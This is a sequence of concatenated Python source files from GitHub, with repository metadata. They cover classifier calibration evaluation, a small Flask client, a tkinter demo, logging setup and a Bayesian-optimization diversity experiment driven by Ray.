argparse\nimport sys\n# sys.path.append('../')\nfrom sklearn.metrics import confusion_matrix\n\n\ndef eval_accuracy(all_label_probs, test_labels, labels_dict_sorted, mode=None, p_cf=None, f_log=None):\n    # evaluate the accuracy with and without contextual calibration\n    num_classes = all_label_probs.shape[1]\n    if p_cf is None:\n        # do not calibrate\n        W = np.identity(num_classes)\n        b = np.zeros([num_classes, 1])\n    else:\n        # calibrate\n        if mode == \"diagonal_W\":\n            W = np.linalg.inv(np.identity(num_classes) * p_cf)\n            b = np.zeros([num_classes, 1])\n        elif mode == \"identity_W\":\n            W = np.identity(num_classes)\n            b = -1 * np.expand_dims(p_cf, axis=-1)\n        else:\n            assert False\n    f_log.write('num_classes:{}'.format(num_classes)+ '\\n')\n    f_log.write('p_cf_w:{}'.format(W)+ '\\n')\n    f_log.write('p_cf_b:{}'.format(b)+ '\\n')\n\n    correctness_list = []\n    #print(len(all_label_probs))\n    #print(len(test_labels))\n    assert len(all_label_probs) == len(test_labels)\n    pred_labels = []\n    for label_probs, true_label in zip(all_label_probs, test_labels):\n        f_log.write('before normalize:{}'.format(label_probs)+ '\\n')\n        label_probs = label_probs / np.sum(label_probs) # normalize to 1\n        f_log.write('after normalize to 1:{}'.format(label_probs)+ '\\n')\n        calibrate_label_probs = np.matmul(W, np.expand_dims(label_probs, axis=-1)) + b\n        f_log.write('after calibrate label probs:{}'.format(calibrate_label_probs)+ '\\n')\n        \n        ## Label-expansion scheme\n        ## Taking tnews as an example, calibrate_label_probs is 75-dimensional at this point, i.e. the calibrated result for each label\n        ## Then average every 5 values and take the maximum to get the corresponding label\n        #calibrate_label_probs1 = calibrate_label_probs.reshape((len(labels_dict_sorted), -1))\n        #calibrate_label_probs2 = np.average(calibrate_label_probs1, axis=1) # mean over rows\n        #ans_label = np.argmax(calibrate_label_probs2)\n\n        ans_label = np.argmax(calibrate_label_probs)\n        f_log.write('np argmax:{}'.format(ans_label)+ '\\n')\n        ans_label = labels_dict_sorted[ans_label]\n        f_log.write('pred label:{}'.format(ans_label)+ '\\n')\n        f_log.write('true label:{}'.format(true_label)+ '\\n')\n        pred_labels.append(ans_label)\n        if str(ans_label) == str(true_label):\n            correctness_list.append(1)\n            print('same' + '\\t' + str(true_label) + '\\t' + str(ans_label))\n            f_log.write('pred and true label is same'+ '\\n')\n        else:\n            
correctness_list.append(0)\n print('diff' + '\\t' + str(true_label) + '\\t' + str(ans_label))\n f_log.write('pred and true label is different'+ '\\n')\n return np.mean(correctness_list), pred_labels\n\n\ndef get_probs_labels(input_params):\n task_type = input_params.task_type\n path = input_params.data_path\n output_path = input_params.output_path\n #output_results_path = os.path.join(output_path, task_type)\n output_results_path = output_path\n os.makedirs(output_results_path, exist_ok=True)\n f_log = open(os.path.join(output_results_path, 'log.txt'), 'w', encoding='utf-8')\n # with open('./result.txt', 'a+', encoding='utf-8') as f:\n # f.write('localtime: {}'.format(time.asctime(time.localtime(time.time()))) + '\\n')\n\n test_labels_path = os.path.join(path, task_type, 'test_labels.txt')\n # test_labels_path = args.test_labels_file\n with open(test_labels_path, 'r', encoding='utf-8') as f_labels:\n labels_str = f_labels.readlines()\n test_labels = [label.strip('\\n') for label in labels_str]\n # print(len(test_labels))\n f_log.write('test_labels:{}'.format(test_labels) + '\\n')\n\n labels_dict_path = os.path.join(path, task_type, 'labels.json')\n # labels_dict_path = args.sample_class_file\n with open(labels_dict_path, 'r', encoding='utf-8') as f_labels_dict:\n # labels_dict_str = f_labels_dict.read().replace(\"'\", \"\\\"\")\n labels_dict = json.load(f_labels_dict)\n #print(labels_dict)\n f_log.write('labels_dict:{}'.format(labels_dict) + '\\n')\n\n labels_dict_sorted = list(labels_dict.keys())\n #print(labels_dict_sorted)\n f_log.write('labels_dict_sorted:{}'.format(labels_dict_sorted) + '\\n')\n\n # labels_dict_inv = {value[0]: key for key, value in labels_dict.items()}\n # print (\"按值(value)排序:\")\n # print(sorted(labels_dict.items(), key = lambda kv:(kv[1], kv[0])))\n\n probs_path = os.path.join(output_results_path, 'output_logits.txt')\n\n all_label_probs = []\n with open(probs_path, 'r', encoding='utf-8') as f_labels:\n probs_str = f_labels.readlines()\n # prob_list = []\n for prob_str in probs_str:\n if \"Logits:\" not in prob_str:\n continue\n else:\n probs = json.loads(prob_str.strip('\\n').split(\"Logits:\")[-1].replace(\"'\", \"\\\"\"))\n # print(probs)\n prob_list=probs[1:]\n all_label_probs.append(prob_list)\n\n all_label_probs = np.array(all_label_probs)\n acc_original, pred_labels_org = eval_accuracy(all_label_probs, test_labels, labels_dict_sorted, f_log=f_log)\n\n logits_free_path = os.path.join(output_results_path, 'output_logits_pcf.txt')\n #logits_free_path = os.path.join(output_results_path, 'output_logits.txt')\n if os.path.exists(logits_free_path):\n p_cf = get_p_content_free(logits_free_path)\n else:\n p_cf = None\n acc_calibrated, pred_labels_cal = eval_accuracy(all_label_probs, test_labels, labels_dict_sorted, mode=\"diagonal_W\", p_cf=p_cf, f_log=f_log)\n accuracies = [acc_original, acc_calibrated]\n print(f\"Accuracies: {accuracies}\")\n print(f\"p_cf : {p_cf}\")\n\n f_log.close()\n with open(os.path.join(output_results_path, 'result_acc.txt'), 'w', encoding='utf-8') as f:\n f.write(\"task: {}, original acc and calibrated acc: {}\".format('cla', accuracies) + '\\n')\n f.write(\"p_cf: {}\".format(p_cf) + '\\n')\n\n with open(os.path.join(output_results_path, 'result_preds.txt'), 'w', encoding='utf-8') as f_preds:\n f_preds.write('true_label' + '\\t' +'pred_label_org' + '\\t' + 'perd_label_cal' + '\\n')\n for true_label, label_org, label_cal in zip(test_labels, pred_labels_org, pred_labels_cal):\n f_preds.write(str(true_label) + '\\t' +str(label_org) + '\\t' + 
str(label_cal) + '\\n')\n\n cm_org = confusion_matrix(test_labels, pred_labels_org, labels=labels_dict_sorted)\n cm_cal = confusion_matrix(test_labels, pred_labels_cal, labels=labels_dict_sorted)\n\n print(\"confusion matrix before calibration\")\n print(cm_org)\n print(\"confusion matrix after calibration\")\n print(cm_cal)\n labels_dict_inv = [value[0] for key, value in labels_dict.items()]\n f_preds.write(\"\\nconfusion matrix before calibration\\n\")\n for label in labels_dict_inv:\n f_preds.write('\\t' + label)\n f_preds.write('\\n')\n for i in range(len(cm_org)):\n f_preds.write(labels_dict_inv[i] + '\\t')\n for j in range(len(cm_org)):\n f_preds.write(str(cm_org[i][j]) + '\\t')\n f_preds.write('\\n')\n\n f_preds.write(\"\\nconfusion matrix after calibration\\n\")\n for label in labels_dict_inv:\n f_preds.write('\\t' + label)\n f_preds.write('\\n')\n for i in range(len(cm_cal)):\n f_preds.write(labels_dict_inv[i] + '\\t')\n for j in range(len(cm_cal)):\n f_preds.write(str(cm_cal[i][j]) + '\\t')\n f_preds.write('\\n')\n\n\ndef get_p_content_free(logits_free_path):\n all_p_y = []\n with open(logits_free_path, 'r', encoding='utf-8') as f_labels:\n probs_str = f_labels.readlines()\n for prob_str in probs_str:\n if \"Logits:\" not in prob_str:\n continue\n else:\n probs = json.loads(prob_str.strip('\\n').split(\"Logits:\")[-1].replace(\"'\", \"\\\"\"))\n prob_list = probs[1:]\n all_p_y.append(prob_list)\n p_y = np.mean(np.array(all_p_y), axis=0)\n p_y = p_y / np.sum(p_y) # normalize\n return p_y\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser(description='eval')\n parser.add_argument('--data_path', default='./tasks/fewclue_text', type=str)\n parser.add_argument('--output_path', default='./', type=str)\n parser.add_argument('--task_type', default='tnews', type=str)\n input_params = parser.parse_args()\n\n get_probs_labels(input_params)\n pass\n","repo_name":"Shawn-Inspur/Yuan-1.0","sub_path":"src/tools/generate_eval.py","file_name":"generate_eval.py","file_ext":"py","file_size_in_byte":8677,"program_lang":"python","lang":"en","doc_type":"code","stars":588,"dataset":"github-code","pt":"53"} +{"seq_id":"70049257449","text":"from flask import Flask\nfrom flask import render_template, request, flash\nfrom flask import redirect, url_for\nfrom flask import jsonify\nimport json, requests\napp = Flask(__name__)\n\n##Settings\napp.secret_key = 'secreto2'\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n\n@app.route('/cajero', methods=['POST'])\ndef cajero():\n if request.method == 'POST':\n idc = request.form['idc']\n fecha = request.form['fecha']\n ruta = 'http://127.0.0.1:5000/cajero/' + idc\n try:\n datos = requests.get(ruta)\n resp = json.loads(datos.content)\n print(resp)\n except:\n return 'Hubo un error'\n return render_template('cajero.html', messages=resp)\n\n@app.route('/usuario', methods=['POST'])\ndef usuario():\n if request.method == 'POST':\n usuario_id = request.form['usuario_id']\n nombre = request.form['nombre']\n ap_pat = request.form['ap_pat']\n ruta = 'http://127.0.0.1:5000/usuario/' + usuario_id\n try:\n datos = requests.get(ruta)\n resp = json.loads(datos.content)\n print(resp)\n except:\n return 'Hubo un error'\n return render_template('cuentas.html', messages=resp)\n\n@app.errorhandler(404)\ndef not_found(error=None):\n message = {\n 'status' : 404,\n 'message' : 'Not Found ' + request.url,\n }\n resp = jsonify(message)\n return resp\n\nif __name__ == '__main__':\n app.run(debug =True, port = 
9000)","repo_name":"galigaribaldi/Proyectos_SD","sub_path":"Proyecto1/API_Cliente/app2.py","file_name":"app2.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3283643926","text":"from tkinter import *\n\nclass Application(Frame):\n def __init__(self, master):\n super().__init__(master)\n self.grid()\n self.create_widgets()\n def create_widgets(self):\n self.btn1 = Button(self, text = 'кнопка 1')\n self.btn1.grid()\n self.btn2 = Button(self)\n self.btn2.grid()\n self.btn2.configure(text = 'кнопка 2')\n self.btn3 = Button(self)\n self.btn3.grid()\n self.btn3['text'] = 'кнопка 3'\n\ndef main():\n root = Tk()\n root.title('окно с кнопками')\n root.geometry('400x200')\n app = Application(master = root)\n root.mainloop()\n\nmain()\n","repo_name":"aomay/python_M.Douson","sub_path":"10/кнопки_объектно/buttons_obj.py","file_name":"buttons_obj.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71573414889","text":"import sys\nimport os\nimport logging.handlers\nimport logging\nfrom commons.variables import (\n ENCODING, LOGGING_LEVEL, LOGGING_FORMAT, LOGGER_CRITICAL, LOGGER_INFO, LOGGER_DEBUG, LOGGER_ERROR\n)\n\nSERVER_FORMATTER = logging.Formatter(LOGGING_FORMAT)\n\nPATH = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'server_logs/server.log')\n\nSTREAM_HANDLER = logging.StreamHandler(sys.stderr)\nSTREAM_HANDLER.setFormatter(SERVER_FORMATTER)\nSTREAM_HANDLER.setLevel(logging.ERROR)\nLOG_FILE = logging.handlers.TimedRotatingFileHandler(PATH, encoding=ENCODING, interval=1, when='h')\nLOG_FILE.setFormatter(SERVER_FORMATTER)\n\nLOGGER = logging.getLogger('server')\nLOGGER.addHandler(STREAM_HANDLER)\nLOGGER.addHandler(LOG_FILE)\nLOGGER.setLevel(LOGGING_LEVEL)\n\n\nif __name__ == '__main__':\n LOGGER.critical(LOGGER_CRITICAL)\n LOGGER.error(LOGGER_ERROR)\n LOGGER.debug(LOGGER_DEBUG)\n LOGGER.info(LOGGER_INFO)\n","repo_name":"dimansidorov/async_python","sub_path":"logs/config_server_logs.py","file_name":"config_server_logs.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39439823746","text":"# ################\n# Experiment 3-2-3 - Effects of diversity on the optimization process when hyper-parameters are fixed to the optimal values for each function\n# Corresponding issue on git - #\n\n# Generates data for BO optimizing with fixed optimal parameters for wildcatwells with args {'N':1,'Smoothness':0.2,'rug_freq':1,'rug_amp':0.7} and seed in the range [0,numfuncs] and saves the figures generated to Experiment3-2-3 directory.\n\n# Needed arguments:\n# #Trials- Number of trials to generate the distribution of data\n# #Numfuncs-Number of functions to generate the data for i.e from seed 0 to numfuncs-1 seed.\n# #intent- choices -> {gen-data: To generate and save data to suitable directory, plot-data: To load data and plot data from the suitable directory}\n# ################\n\nimport sys\nsys.path.insert(1, '../src/optimizers')\nsys.path.insert(1, '../src')\n\nfrom objectives import objectives\n\nimport data_gen\nimport numpy as np\nimport random\nimport string\nimport pickle\nimport dill\nimport matplotlib as mpl\nfrom matplotlib import pyplot as plt\nfrom matplotlib.collections import LineCollection\nfrom matplotlib.colors import ListedColormap, BoundaryNorm\nfrom scipy.stats import 
kde\n\nfrom ipyparallel import Client\nimport ipyparallel as ipp\nimport os\nimport subprocess\nimport time\nimport itertools\nfrom tqdm import tqdm\nimport itertools\nimport pandas as pd\nimport results\nimport ray\nfrom os.path import exists\nif sys.platform.startswith('win'):\n os.environ[\"KMP_DUPLICATE_LIB_OK\"]=\"TRUE\"\n\ndef savefile(filename,variable):\n os.makedirs(os.path.dirname(filename), exist_ok=True)\n with open(filename, 'wb') as f:\n dill.dump(variable, f)\n return variable\n\ndef unique_file(basename, ext):\n actualname = \"%s.%s\" % (basename, ext)\n c = itertools.count()\n while os.path.exists(actualname):\n actualname = \"%s (%d).%s\" % (basename, next(c), ext)\n return actualname\n\ndef load_variable(filename):\n with open(filename, 'rb') as f:\n variable = dill.load(f)\n return variable\n\n@ray.remote(num_gpus=0.1,num_cpus=0.5)\ndef map_(opt,objective,trial,percentile):\n import os\n os.environ[\"KMP_DUPLICATE_LIB_OK\"]=\"TRUE\"\n objective.seed=trial\n if objective.fun_name!='wildcatwells':\n wildcatwells=objective.generate_cont()\n else:\n wildcatwells=objective.generate_cont(from_saved=True,local_dir='C:\\\\temp\\\\wildcatwells')\n counter=0\n opt.datagenmodule.options['seed']=trial*7\n opt.datagenmodule.generate()\n while counter<5:\n try:\n opt.train=opt.datagenmodule.sample(percentile)\n result= opt.optimize(wildcatwells)\n result.seed=trial\n return result\n except KeyboardInterrupt:\n raise KeyboardInterrupt('Keyboard interrupt')\n except:\n counter+=1\n print('Error occured restarting.')\n\nimport math\nimport results\nfrom IPython.display import clear_output\n\n#need to add log arg\ndef main(trials,ind_trials,dim_mat,objective_func,reverse=False):\n \n #Set-up variables\n completedata={} \n percentilemat=[5,95]\n \n available_locs=[0]\n batch_size=5\n \n if objective_func=='wildcatwells':\n ruggedness_mat=['low','medium','high']\n else:\n ruggedness_mat=['None']\n \n while len(available_locs)>0:\n from os.path import exists\n available_locs=[]\n for dim in np.arange(*dim_mat):\n for level_of_ruggedness in ruggedness_mat:\n for seed in range(trials):\n filename='../Data/ExperimentA4/'+objective_func+'/'+str(dim)+'/'+level_of_ruggedness+'/data'+str(seed)+'.pkl'\n if exists(filename):\n print(dim,level_of_ruggedness,seed)\n pass\n else:\n available_locs.append((dim,level_of_ruggedness,seed))\n \n if not reverse:\n dim,level_of_ruggedness,seed=available_locs[0]\n else:\n dim,level_of_ruggedness,seed=available_locs[-1]\n\n# dim,level_of_ruggedness,seed=3.0,'None',4\n filename='../Data/ExperimentA2/'+objective_func+'/'+str(dim)+'/'+level_of_ruggedness+'/data'+str(seed)+'.pkl'\n hpseries=load_variable(filename)\n print('Working on Trial {} of {}, for dim= {}, rug ={}'.format(seed+1,trials,dim,level_of_ruggedness))\n hpseries.extract_hyperparam()\n \n# Create a result object for the trial data\n result=results.result_diversity_trial()\n result.percentiles=percentilemat \n \n filename='../Data/experimentA4/'+objective_func+'/'+str(dim)+'/'+level_of_ruggedness+'/data'+str(seed)+'.pkl'\n savefile(filename,result)\n \n print(\"Computing data for {} dimensions\".format(str(dim)))\n \n # Set-up the function generator\n synth_func=objectives()\n if objective_func=='wildcatwells':\n synth_func.bounds=[(0,100)]*int(dim)\n elif objective_func=='Rastrigin':\n synth_func.bounds=[(-5.12,5.12)]*int(dim)\n elif objective_func=='Rosenbrock':\n synth_func.bounds=[(-10,10)]*int(dim)\n else:\n synth_func.bounds=[(-10,10)]*int(dim)\n synth_func._dim=int(dim)\n 
synth_func.fun_name=objective_func\n synth_func.budget=50**int(dim)\n\n #Set-up the diversity training data generator\n synth_data=data_gen.diverse_data_generator()\n synth_data.options['bounds']=synth_func.bounds\n synth_data.options['N_samples']=1000\n synth_data.gamma=1e-4\n synth_data.options['seed']=seed*7\n if objective_func=='wildcatwells':\n if int(dim)==3:\n synth_data.training_size=40\n else:\n synth_data.training_size=10\n elif objective_func=='Sphere':\n if int(dim)==2:\n synth_data.training_size=8\n elif dim==3:\n synth_data.training_size=12\n elif dim==4:\n synth_data.training_size=38\n else:\n synth_data.training_size=75\n elif objective_func=='Rastrigin':\n if int(dim)==2:\n synth_data.training_size=5\n elif dim==3:\n synth_data.training_size=7\n elif dim==4:\n synth_data.training_size=30\n else:\n synth_data.training_size=60\n elif objective_func=='Rosenbrock':\n if int(dim)==2:\n synth_data.training_size=4\n elif dim==3:\n synth_data.training_size=5\n elif dim==4:\n synth_data.training_size=8\n else:\n synth_data.training_size=20\n \n print('Computation started for {} ruggedness'.format(level_of_ruggedness))\n\n #Vary the synthetic black-box function for the sensitivity analysis\n if level_of_ruggedness=='low':\n synth_func.args={'N':1,'Smoothness':0.8,'rug_freq':1,'rug_amp':0.2,'A':10}\n elif level_of_ruggedness=='medium':\n synth_func.args={'N':1,'Smoothness':0.4,'rug_freq':1,'rug_amp':0.4,'A':10}\n else:\n synth_func.args={'N':1,'Smoothness':0.2,'rug_freq':1,'rug_amp':0.8,'A':10}\n\n \n #For diversity trial we need to iterate over different percentiles of diversity.\n for percentile in percentilemat:\n print('{}th percentile of diversity being evaluated'.format(percentile))\n \n #Set-up the optimizer\n from Optimizers import optimizer\n BO=optimizer()\n if dim==2:\n BO.max_iter=100\n elif dim>=3:\n BO.max_iter=400\n \n BO.opt=\"BO-fixparam\"\n BO.optima=synth_func.optimal_y\n BO.paramset=hpseries.optdict\n BO.tol=0.1\n BO.minimize=synth_func.minstate\n BO.bounds=synth_func.bounds\n \n #Add appropriate training data to BO.\n BO.datagenmodule=synth_data\n \n #Run the parallel process/Trial\n ray.shutdown()\n time.sleep(10)\n ray.init(runtime_env={\"working_dir\": \"../src\"}, num_cpus=10,num_gpus=2,log_to_driver=False)\n from tqdm.autonotebook import tqdm\n \n init_trial=0\n with tqdm(total=ind_trials-init_trial) as pbar:\n for batch_num in range(init_trial//batch_size,ind_trials//batch_size):\n current_result=ray.get([map_.remote(BO,synth_func,trial_num,percentile) for trial_num in range(batch_num*batch_size,(batch_num+1)*batch_size)])\n [[result.addresult(percentile,ind_result) for ind_result in current_result if ind_result is not None]]\n pbar.update(batch_size)\n #Save Data to the Result trial object and append to an outer list collecting data for each seed in the trial.\n filename='../Data/experimentA4/'+objective_func+'/'+str(dim)+'/'+level_of_ruggedness+'/data'+str(seed)+'.pkl'\n savefile(filename,result)\n return\n\nif __name__=='__main__':\n \n import argparse\n import asyncio\n import os\n from utils import bootstrap\n \n parser = argparse.ArgumentParser()\n parser.add_argument(\"--trials\", type=int, default=10,\n help=\"Number of seeds for each iteration of ruggedness and smoothness that need to be evaluated.\")\n 10,\n parser.add_argument(\"--ind_trials\", type=int, default=20, help=\"Number of evaluation for each each seed\")\n \n parser.add_argument(\"--fun_name\",choices={\"wildcatwells\", 
\"Sphere\",\"Rastrigin\",\"Rosenbrock\"},default=\"wildcatwells\")\n \n parser.add_argument(\"--dimension_mat\", default=\"2, 6, 1\" , type=lambda s: tuple(float(item) for item in s.split(',')),\n help=\"Define the range generator for smoothness with a delimited string seperated by commas of the form :- ''start,stop,step'' \")\n \n parser.add_argument(\"--intent\", choices={\"gen-data\",\"optimal_init_iter\" ,\"plot-data\",\"save_compile_data\"}, default=\"gen-data\")\n \n parser.add_argument(\"--grid_type\",choices={\"difference\",\"comparison\"},default=\"comparison\")\n \n args = parser.parse_args()\n\n\n success=False\n if args.intent=='gen-data' or args.intent=='both':\n main(args.trials,args.ind_trials,args.dimension_mat,args.fun_name)\n \n \n def plot_data(percentile,dim,level_of_ruggedness,seed,args):\n if args.fun_name=='wildcatwells':\n filename='../Data/experimentA4/wildcatwells/'+str(dim)+'/'+level_of_ruggedness+'/data'+str(seed)+'.pkl'\n result=load_variable(filename)\n result.opt=100\n else:\n filename='../Data/experimentA4/'+level_of_ruggedness+'/'+str(dim)+'/None/data'+str(seed)+'.pkl'\n result=load_variable(filename)\n if args.grid_type=='comparison':\n try:\n return result.bootstrap(percentile)\n except:\n print(dim,level_of_ruggedness,seed)\n raise Exception('Error')\n else:\n try:\n return result.difference_bootstrap_plotdata()\n except:\n print(dim,level_of_ruggedness,seed)\n raise Exception('Error')\n\n def get_all_seed_data(dim,level_of_ruggednss,grid_type,args):\n import ray\n @ray.remote\n def map_(obj, f):\n import sys\n sys.path.insert(1, '../src/optimizers')\n sys.path.insert(1, '../src')\n import results\n return f(*obj)\n ray.shutdown()\n ray.init()\n if grid_type=='comparison':\n return ray.get([map_.remote([5,dim,level_of_ruggedness,seed,args], plot_data) for seed in range(10)]),ray.get([map_.remote([95,dim,level_of_ruggedness,seed,args], plot_data) for seed in range(10)])\n elif grid_type=='difference':\n return ray.get([map_.remote(['None',dim,level_of_ruggedness,seed,args], plot_data) for seed in range(10)])\n \n \n if args.intent=='save_compile_data': \n completedata={}\n dim_mat=np.arange(*args.dimension_mat)\n if args.fun_name=='wildcatwells':\n ruggedness_mat=['low','medium','high']\n else:\n ruggedness_mat=['Sphere','Rosenbrock','Rastrigin']\n for dim in dim_mat:\n completedata[dim]={}\n for level_of_ruggedness in ruggedness_mat:\n completedata[dim][level_of_ruggedness]={}\n grids=['comparison','difference']\n for grid_type in grids:\n plotdata=get_all_seed_data(dim,level_of_ruggedness,grid_type,args)\n if grid_type=='comparison':\n completedata[dim][level_of_ruggedness][grid_type]=[bootstrap(single_percentile_data) for single_percentile_data in np.array(plotdata)[:,:,0,:]]\n else:\n completedata[dim][level_of_ruggedness][grid_type]=bootstrap(np.array(plotdata)[:,0,:])\n \n if args.fun_name=='wildcatwells':\n filename='../Data/experimentA4/wildcatwells-plot-data.pkl'\n else:\n filename='../Data/experimentA4/test-plot-data.pkl'\n savefile(filename,completedata)\n \n if args.intent=='plot-data':\n \n if args.fun_name=='wildcatwells':\n filename='../Data/experimentA4/wildcatwells-plot-data.pkl'\n else:\n filename='../Data/experimentA4/test-plot-data.pkl'\n \n if exists(filename):\n completedata=load_variable(filename)\n else:\n raise Exception('Save plot data using --intent \"save_compile_data\"')\n \n def average_cumoptgap(percentilemat,dim,level_of_ruggedness):\n import numpy as np\n cumoptgap_data=[]\n for seed in range(10):\n if 
def average_cumoptgap(percentilemat,dim,level_of_ruggedness):\n import numpy as np\n cumoptgap_data=[]\n for seed in range(10):\n if args.fun_name=='wildcatwells':\n filename='../Data/experimentA4/wildcatwells/'+str(dim)+'/'+level_of_ruggedness+'/data'+str(seed)+'.pkl'\n result=load_variable(filename)\n result.opt=100\n cumoptgap_data.append(result.percentage_imporvement_cum_opt_gap(percentilemat)[0])\n else:\n filename='../Data/experimentA4/'+level_of_ruggedness+'/'+str(dim)+'/None/data'+str(seed)+'.pkl'\n result=load_variable(filename)\n result.opt=0\n cumoptgap_data.append(result.percentage_imporvement_cum_opt_gap(percentilemat)[0])\n return np.average(cumoptgap_data)\n \n dim_mat=np.arange(*args.dimension_mat)\n if args.fun_name=='wildcatwells':\n ruggedness_mat=['low','medium','high']\n else:\n ruggedness_mat=['Sphere','Rosenbrock','Rastrigin']\n \n #Generate plot and save it to the appropriate directory.\n with plt.style.context(['science','no-latex']):\n fig, ax = plt.subplots(len(dim_mat), len(ruggedness_mat), sharex='row',figsize=(30,21))\n \n for i,dim in enumerate(dim_mat):\n for j,level_of_ruggedness in enumerate(ruggedness_mat):\n percentilemat=[5,95]\n cumoptgap=average_cumoptgap(percentilemat,dim,level_of_ruggedness)\n cumoptgaptext1='Diversity helped improve'\n cumoptgaptext2='performance by '+ str(round(cumoptgap*100,2)) + ' percent'\n if not exists(filename):\n plotdata=get_all_seed_data(dim,level_of_ruggedness,args.grid_type,args)\n else:\n plotdata=completedata[dim][level_of_ruggedness]\n if args.grid_type==\"comparison\":\n #bootstraps the data for the line plot for each percentile in the diversity trial result object.\n for k,percentile in enumerate(percentilemat):\n if not exists(filename):\n bootstrap_on_trials=bootstrap(np.array(plotdata)[:,:,0,:][k])\n else:\n bootstrap_on_trials=plotdata[args.grid_type][k]\n label=str(percentile)+'th percentile'\n ax[i,j].plot(np.arange(args.max_iter+2), bootstrap_on_trials[0], '-',label=label) #Plotting the mean data\n ax[i,j].fill_between(np.arange(args.max_iter+2),bootstrap_on_trials[1], \n bootstrap_on_trials[2], alpha=0.3) #Plotting the 90% confidence intervals.\n ax[i,j].text(15,20, cumoptgaptext1,fontsize='15')\n ax[i,j].text(10,17, cumoptgaptext2,fontsize='15')\n \n ax[i,j].legend(fontsize='x-small')\n ax[i,j].set_ylim([0, 40])\n ax[i,j].set_xlim([0, int(args.max_iter/2)])\n \n else:\n if not exists(filename):\n bootstrap_on_trials=bootstrap(np.array(plotdata)[:,0,:])\n else:\n bootstrap_on_trials=plotdata[args.grid_type]\n def create_colormap_and_ls(x,y):\n # select how to color: BoundaryNorm with bounds straddling zero maps negative segments to the 'under' colour (tomato) and positive ones to the 'over' colour (yellowgreen)\n cmap = (mpl.colors.ListedColormap(['tomato','blue','yellowgreen']).with_extremes(over='yellowgreen', under='tomato'))\n bounds = [-1e-10,0.0,1e-10]\n norm = mpl.colors.BoundaryNorm(bounds, cmap.N)\n \n # get segments\n xy = np.array([x, y]).T.reshape(-1, 1, 2)\n segments = np.hstack([xy[:-1], xy[1:]])\n \n # make line collection\n lc = LineCollection(segments, cmap = cmap, norm = norm, linewidths=2)\n lc.set_array(y)\n return cmap,norm,lc\n \n cmap,norm,lc=create_colormap_and_ls(np.arange(len(bootstrap_on_trials[0])),bootstrap_on_trials[0])\n\n ax[i,j].add_collection(lc) #Plotting the mean data as a line segment\n\n ax[i,j].fill_between(np.arange(len(bootstrap_on_trials[0])),bootstrap_on_trials[1], \n bootstrap_on_trials[2], alpha=0.1, hatch='\\\\\\\\\\\\\\\\',facecolor='azure') \n ax[i,j].axhline(y=0,label='Insignificant difference in performance',color='blue')\n\n if cumoptgap<0: \n c='r'\n else:\n c='g'\n# ax[i,j].text(20,5, str(round(cumoptgap,2)) ,fontsize='50',color=c)\n handles, labels = ax[i,j].get_legend_handles_labels()\n
if level_of_ruggedness!='Rosenbrock':\n ax[i,j].set_ylim([-20, 10])\n ax[i,j].text(20,3.5, str(round(cumoptgap,2)) ,fontsize='50',color=c)\n else:\n ax[i,j].set_ylim([-20000, 10000])\n ax[i,j].text(20,3500.5, str(round(cumoptgap,2)) ,fontsize='50',color=c)\n ax[i,j].tick_params(axis='x', labelsize=25)\n ax[i,j].tick_params(axis='y', labelsize=25)\n \n if dim==2:\n ax[i,j].set_xlim([0, int(len(bootstrap_on_trials[0])/2)])\n else:\n ax[i,j].set_xlim([0, 100])\n if j==0:\n y_label=dim\n ax[i,j].set_ylabel(str(round(y_label,2)),fontsize='30')\n if i==len(dim_mat)-1:\n x_label=level_of_ruggedness\n ax[i,j].set_xlabel(x_label,fontsize='30')\n \n if args.grid_type!=\"comparison\":\n right,bottom,width,height=0.83,0.1,0.03,0.8\n cbar_ax = fig.add_axes([right,bottom,width,height])\n cbar=fig.colorbar(\n mpl.cm.ScalarMappable(cmap=cmap, norm=norm), extend='both',\n extendfrac='auto',ax=ax.ravel().tolist(),cax=cbar_ax)\n cbar.set_label(label='Effect of diversity on performance of optimizer',fontsize='30')\n cbar.set_ticks([])\n ax[int(len(dim_mat)/2)-1,0].text(-38,-60 , \"Number of Dimensions\",fontsize='45',rotation=90)\n if args.fun_name=='wildcatwells':\n ax[len(dim_mat)-1,int(len(ruggedness_mat)/2)].text(0,-17 ,\"Level of Ruggedness\",fontsize='45')\n else:\n ax[len(dim_mat)-1,int(len(ruggedness_mat)/2)].text(20,-33500 ,\"Test functions\",fontsize='45')\n \n plt.subplots_adjust(\n left = 0.1, # the left side of the subplots of the figure\n right = 0.8, # the right side of the subplots of the figure\n bottom = 0.1, # the bottom of the subplots of the figure\n top = 0.9, # the top of the subplots of the figure\n wspace = 0.2, # the amount of width reserved for blank space between subplots\n hspace = 0.2) # the amount of height reserved for white space between subplots\n\n if args.grid_type==\"comparison\":\n fig.suptitle('Comparison in optimality gap when hyperparameters are fixed for the optimizer',fontsize='48', x=0.4, horizontalalignment='center')\n filename,ext= '../results/ExperimentA4/comparison-plot','.png'\n else:\n fig.suptitle('Absolute difference in optimality gap (y-axis) vs iterations (x-axis) \\n when hyperparameters are fixed',fontsize='48', x=0.45, horizontalalignment='center')\n filename,ext= '../results/ExperimentA4/difference-plot','.png'\n\n try:\n savename=unique_file(filename, ext)\n plt.savefig(os.path.abspath(savename),bbox_inches = 'tight')\n plt.close()\n except FileNotFoundError:\n savename=unique_file(filename, ext)\n os.makedirs(os.path.dirname(savename), exist_ok=True)\n plt.savefig(os.path.abspath(savename),bbox_inches = 'tight')\n plt.close()\n ","repo_name":"IDEALLab/JMD-Diversity-in-Bayesian-Optimization","sub_path":"Scripts/ExperimentA4.py","file_name":"ExperimentA4.py","file_ext":"py","file_size_in_byte":22600,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
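# --- Added aside (not part of the dataset records): ExperimentA4.py above dispatches trials to Ray in fixed-size batches and blocks on ray.get before starting the next batch. A minimal self-contained sketch of that pattern (function names and the toy workload are ours):
import ray

@ray.remote
def _one_trial(i):
    return i * i  # stand-in for a single optimization trial

def _run_batched(n_trials=8, batch_size=4):
    ray.init(ignore_reinit_error=True)
    results = []
    for batch_num in range(n_trials // batch_size):
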